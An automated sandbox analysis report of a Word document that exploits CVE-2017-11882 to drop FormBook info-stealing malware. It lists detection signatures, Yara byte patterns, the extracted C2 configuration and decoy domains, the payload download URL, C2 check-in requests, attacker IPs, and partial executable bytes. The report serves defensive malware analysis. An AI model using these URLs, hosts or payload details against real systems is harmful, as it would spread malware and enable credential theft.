Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO789.doc

Overview

General Information

Sample Name:PO789.doc
Analysis ID:552782
MD5:6c28e31d32e97db724188025636ac25e
SHA1:c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256:c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags:docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • medicomsh78694.exe (PID: 2824 cmdline: C:\Users\user\AppData\Roaming\medicomsh78694.exe MD5: 8807C2E0F2973A22812AF6E61BA72667)
      • medicomsh78694.exe (PID: 2008 cmdline: {path} MD5: 8807C2E0F2973A22812AF6E61BA72667)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 448 cmdline: /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.medicomsh78694.exe.3221198.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.medicomsh78694.exe.3221198.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83e38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x841d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabc58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0xb7d05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x8f9d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0xb77f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x8ffe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0xb7e07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x9015f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb7f7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x84bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0xaca0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x8ec4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb6a6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x85962:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0xad782:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x953d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0xbd1f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x9647a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.medicomsh78694.exe.3221198.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x92309:$sqlite3step: 68 34 1C 7B E1
        • 0x9241c:$sqlite3step: 68 34 1C 7B E1
        • 0xba129:$sqlite3step: 68 34 1C 7B E1
        • 0xba23c:$sqlite3step: 68 34 1C 7B E1
        • 0x92338:$sqlite3text: 68 38 2A 90 C5
        • 0x9245d:$sqlite3text: 68 38 2A 90 C5
        • 0xba158:$sqlite3text: 68 38 2A 90 C5
        • 0xba27d:$sqlite3text: 68 38 2A 90 C5
        • 0x9234b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x92473:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba16b:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba293:$sqlite3blob: 68 53 D8 7F 8C
        5.2.medicomsh78694.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.medicomsh78694.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 6 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\medicomsh78694.exe, NewProcessName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, OriginalFileName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ProcessId: 2824
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2848

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO789.docVirustotal: Detection: 57%Perma Link
          Source: PO789.docReversingLabs: Detection: 53%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://peak-tv.tk/medicomzx.exeAvira URL Cloud: Label: malware
          Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90iAvira URL Cloud: Label: malware
          Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90iAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: peak-tv.tkVirustotal: Detection: 5%Perma Link
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeMetadefender: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeReversingLabs: Detection: 51%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMetadefender: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeReversingLabs: Detection: 51%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeJoe Sandbox ML: detected
          Source: 5.0.medicomsh78694.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.medicomsh78694.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.medicomsh78694.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.medicomsh78694.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to behavior
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drStream path '_1703602930/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
          Source: global trafficDNS query: name: peak-tv.tk
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BA28
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BAD8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BBC8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BA18
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BAC8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0037BBC0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0044F2A8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop ebx5_2_00406ABB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi5_2_0040C41C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi5_2_0041566C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi5_2_004156A7
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.13 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exeDomain query: www.realstakepool.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 109.94.209.123 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.prestigiousuniforms.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.carbonfiber.cloud/md4m/
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 2.58.149.41 2.58.149.41
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Jan 2022 17:17:00 GMTServer: ApacheLast-Modified: Tue, 11 Jan 2022 16:19:34 GMTETag: "aca00-5d550d19904c2"Accept-Ranges: bytesContent-Length: 707072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 